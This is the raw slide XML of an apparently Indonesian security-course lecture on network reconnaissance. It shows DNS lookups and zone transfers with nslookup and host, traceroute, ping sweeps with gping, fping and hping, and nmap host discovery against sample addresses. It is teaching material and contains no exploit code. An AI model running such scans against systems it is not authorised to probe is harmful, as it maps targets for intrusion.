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1" r:id="rId3"/>
    <p:sldId id="282" r:id="rId4"/>
    <p:sldId id="283" r:id="rId5"/>
    <p:sldId id="284" r:id="rId6"/>
    <p:sldId id="285" r:id="rId7"/>
    <p:sldId id="286" r:id="rId8"/>
    <p:sldId id="287" r:id="rId9"/>
    <p:sldId id="288" r:id="rId10"/>
    <p:sldId id="289" r:id="rId11"/>
    <p:sldId id="291" r:id="rId12"/>
    <p:sldId id="292" r:id="rId13"/>
    <p:sldId id="293" r:id="rId14"/>
    <p:sldId id="294" r:id="rId15"/>
    <p:sldId id="295" r:id="rId16"/>
    <p:sldId id="296" r:id="rId17"/>
    <p:sldId id="297" r:id="rId18"/>
    <p:sldId id="298"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257" r:id="rId42"/>
    <p:sldId id="258" r:id="rId43"/>
    <p:sldId id="260" r:id="rId44"/>
    <p:sldId id="261" r:id="rId45"/>
    <p:sldId id="259" r:id="rId46"/>
    <p:sldId id="262" r:id="rId47"/>
    <p:sldId id="263" r:id="rId48"/>
    <p:sldId id="264" r:id="rId49"/>
    <p:sldId id="265" r:id="rId50"/>
    <p:sldId id="266" r:id="rId51"/>
    <p:sldId id="267" r:id="rId52"/>
    <p:sldId id="268" r:id="rId53"/>
    <p:sldId id="269" r:id="rId54"/>
    <p:sldId id="270" r:id="rId55"/>
    <p:sldId id="271" r:id="rId56"/>
    <p:sldId id="272" r:id="rId57"/>
    <p:sldId id="273" r:id="rId58"/>
    <p:sldId id="322" r:id="rId59"/>
    <p:sldId id="274" r:id="rId60"/>
    <p:sldId id="275" r:id="rId61"/>
    <p:sldId id="276" r:id="rId62"/>
    <p:sldId id="277" r:id="rId63"/>
    <p:sldId id="278" r:id="rId64"/>
    <p:sldId id="279" r:id="rId6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94581" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="-12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6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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{C7D35361-3379-4C49-B4A6-C8AE7581253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B73AA2E-80C6-4213-983E-10329A81829C}"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F7357E3-A5E8-470E-81E7-5A45F7191D9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6A81C60-6908-46B0-86B1-D81EB40FB37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87553DF-3C9B-42CE-A67F-F620CDD146C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A33B5AB-08D6-4E7F-9A38-135ACA5D1610}"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414AE05-5CB4-47AC-8E57-271EEC7DB6F7}"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4A85F149-0414-4647-AAEE-65821821B9E7}"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33EC9DE3-959F-44CD-AC1B-A4AD78A31B6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5AE641CC-BE5F-41FF-9B2A-F061849BC1FF}"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E844F52-C903-4BB9-AB95-659EA7C73E02}"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E6BAEF6-7F42-48D3-A792-A27CC75EF83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a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>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a:defRPr/>
            </a:pPr>
            <a:fld id="{A0B470C6-E5D2-4F12-B7D5-D7846388BE3C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2052" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="546100"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5760" cy="344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5125"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5126"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5127"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128"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129"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130"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131"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5132"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133"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bi.go.i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hyperlink" Target="http://online.securityfocus.com/bid/180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4600" smtClean="0"/>
              <a:t>Eksploitasi Keamanan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Program “nslookup”</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Nslookup untuk mencari informasi domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nslookup ns @dns.server domain.name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Zone transfer dengan nslookup</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; server 167.205.21.82</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; set type=any</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; ls –d Acme.net &gt;&gt; /tmp/zone_out</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; ctrl-D</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>more /tmp/zone_out</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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Program “host”</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1641475"/>
            <a:ext cx="8153400" cy="4454525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Mencari informasi mengenai name server (ns), mail record (mx), dll.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.indocisc.com</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>www.indocisc.com has address 202.138.225.178</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>host –t ns indocisc.com</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>indocisc.com name server home.globalnetlink.com.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Indocisc.com name server mx.insan.co.id.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>host –t mx indocisc.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>indocisc.com mail is handled by 5 mx.insan.co.id.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>host –l indocisc.com mx.insan.co.id</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-GB" sz="2400" smtClean="0">
              <a:latin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Masih Tentang DNS</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Zone transfer harusnya dibatasi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Zone transfer via web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://us.mirror.menandmice/cgi-bin/DoDig</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Name server:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Domain name:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Query type: Zone Transfer (AXFR)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15364" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="4648200"/>
            <a:ext cx="2381250" cy="1019175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="s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Routing</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Traceroute untuk mengetahui routing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Unix</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>traceroute 167.205.21.82</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DOS&gt; tracert 167.205.21.82</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://visualroute.visualware.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>visualroute.visualware.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17411" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="1905000"/>
            <a:ext cx="647700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Server hidup?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Ping, gping, hping</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>mencari host yang hidup (alive)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix% gping 192 168 1 1 254 | fping –a</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.254 is alive</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.227 is alive</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.1 is alive</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.190 is alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Membutuhkan ICMP traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix% hping 192.168.1.2 –S –p 80 -f</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" smtClean="0">
              <a:latin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Masih tentang ping</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix% nmap –sP 192.168.1.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Kalau ICMP diblokir</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nmap –sP –PT80 192.168.1.0/24</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>mengirimkan paket ACK dan menunggu paket RST untuk menandakan host alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Windows: pinger dari Rhino9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>http://www.nmrc.org/files/snt</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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ICMP Query</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Mencari informasi dengan mengirimkan paket ICMP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>icmpquery –t 192.168.1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.1	: 11:36:19</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
